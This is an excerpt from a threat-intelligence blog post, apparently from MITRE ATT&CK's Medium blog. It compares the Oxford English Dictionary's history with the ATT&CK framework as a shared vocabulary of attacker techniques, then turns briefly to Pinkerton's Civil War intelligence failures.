
A Dictionary of Threats

While the United States was fighting the bloodiest war in the nation’s history, an idea was blossoming among philologists in the United Kingdom. English speakers had colonized many parts of the world, English customs and culture were forcing themselves into existing cultures and communities, and few resources existed to standardize vocabulary. Academics in the UK argued that there should be a single authoritative resource to define the English language, documenting and establishing the correct form of communication.

Formally proposed in 1857, what would become known as the Oxford English Dictionary would eventually achieve its goal of standardizing English words beginning in 1884. It was a massive undertaking that brought together academics, historians, and the English-speaking public to collect and define words. In fact, the dictionary could not have been written without considerable public assistance.

The MITRE ATT&CK framework has become the universal dictionary of TTPs, in large part due to contributions from analysts and researchers around the globe. According to MITRE, 155 people contributed to the framework in 2021. (In fact, this year my Proofpoint colleague Michael Raggi contributed an update to ATT&CK Technique T1221 to include a novel RTF template injection technique observed in use by multiple threat actors.)

The authoritative nature of the framework has allowed analysts to verify open-source reporting, and better understand the nature of threat actors. It has also allowed researchers to more effectively document and communicate threat behaviors, prioritize detections, and improve defense. By standardizing how we identify and classify threat behaviors, actionable intelligence can be more easily communicated to a variety of stakeholders.

Pinkerton did not have a reliable threat intelligence framework or dictionary from which to operate; indeed, he was trailblazing the creation of a secret service that had never before existed. And while his early work helped pave the way for modern day spying and the development of the Secret Service, he and his team were far from perfect. But by examining the intelligence reporting failures documented by modern historians, threat intelligence analysts can be better prepared when they too may one day be called on to help change the course of history.


Intelligence Failures of Lincoln’s Top Spies: What CTI Analysts Can Learn From the Civil War was originally published in MITRE ATT&CK® on Medium, where people are continuing the conversation by highlighting and responding to this story.
